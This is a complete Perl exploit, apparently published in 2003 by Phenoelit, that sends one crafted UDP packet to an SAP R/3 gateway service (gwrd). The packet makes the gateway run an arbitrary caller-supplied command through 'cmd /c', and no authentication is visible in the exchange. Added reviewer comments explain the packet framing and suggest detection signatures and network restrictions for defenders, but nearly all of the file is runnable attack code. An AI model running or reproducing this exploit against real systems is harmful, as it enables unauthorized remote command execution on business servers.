#!/usr/bin/perl -w
use IO::Socket;

#
# Executes the command given as the first argument as a child process of
# gwrd in Windows R/3 environments. The request packet must not contain the
# space character (0x20), so spaces in the command are sent as tabs (0x09).
# The command interpreter must be changed for other (UNIX) environments.
#
# 2003, FX of Phenoelit <fx@phenoelit.de>
#

# Turn on autoflush for the currently selected output handle.
$|=1;

# MSDN documentation of CreateProcess() :
# http://msdn.microsoft.com/library/en-us/dllproc/base/createprocess.asp

# Positional arguments: command (required), host (required), port (optional,
# falls back to "3300"). The checks test truthiness, so an empty string or
# "0" is treated the same as a missing argument.
# NOTE(review): the script runs with -w but without "use strict", so
# $command, $host, $port and $request are package globals.
die "Give command" unless ($command=shift);
die "Give host" unless ($host=shift);
$port="3300" unless ($port=shift);

# Every space in the command text becomes a tab (0x09). Only the command is
# rewritten; the 0x20 further down is one of the fixed request bytes.
$command=~s/ /\x09/g;

# The request is a fixed byte prefix followed by the caller's command text.
# The prefix is reproduced exactly as published; this file does not document
# what the individual fields mean, so none are named here.
#
# Reviewer notes for defenders:
#  - No authentication or session setup is visible anywhere in this script;
#    the request is the first and only thing written to the socket.
#    Presumably the affected service accepted it as-is -- confirm against
#    the vendor advisory for the installed release and apply the vendor fix.
#  - The command text is the only caller-controlled part of the packet. It
#    is always framed as "cmd<TAB>/c<TAB>(" ... ")<TAB>&&", so that framing
#    on traffic to the gateway port, or a command interpreter started as a
#    child of gwrd, is what a detection for this exact script can key on.
#    The framing is easy to vary, so treat it as a test signature for this
#    script rather than as general coverage.
#  - Limiting which hosts can reach the gateway port reduces exposure
#    regardless of the payload.
$request = 
	"\x01".
	"\x02".
	"\x41\x42\x43".
	"\x01".
	"\x20".
	"\x00\x00\x00".
	"\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50".
	"\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51".
	"\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52".
	"\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53".
	"\x54\x54\x09\x09\x09\x09\x09\x09\x09\x09".
	"A\x09\x09\x09\x09\x09\x09\x09\x09".
	"AAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00".
	# Command text, wrapped in cmd /c ( ... ) with tabs in place of spaces.
	# Per the original author, the string must end with && because 0x00
	# termination does not work at this position.
	"cmd\x09/c\x09(".$command.")\x09"."&&".
	"";


# Send the request once. send_UDP() reads $request as a global; only the
# host and port are passed as arguments.
&send_UDP($host,$port);

exit 0;

# send_UDP($dest, $port)
#
# Creates an IO::Socket::INET socket with Proto "udp" towards $dest:$port,
# writes the package global $request to it once, then closes the socket.
# Dies with "cannot get socket for $dest" when the socket cannot be created.
# Nothing is read back from the peer, so the caller gets no indication of
# whether the request was received or acted upon.
sub send_UDP {
    my ($dest, $port) = @_;

    my $remote = IO::Socket::INET->new(
        Proto    => "udp",
        PeerAddr => $dest,
        PeerPort => "$port",
    );
    die "cannot get socket for $dest" unless $remote;

    # Flush on every write so the request leaves before the socket is closed.
    $remote->autoflush(1);
    print {$remote} $request;

    close $remote;
}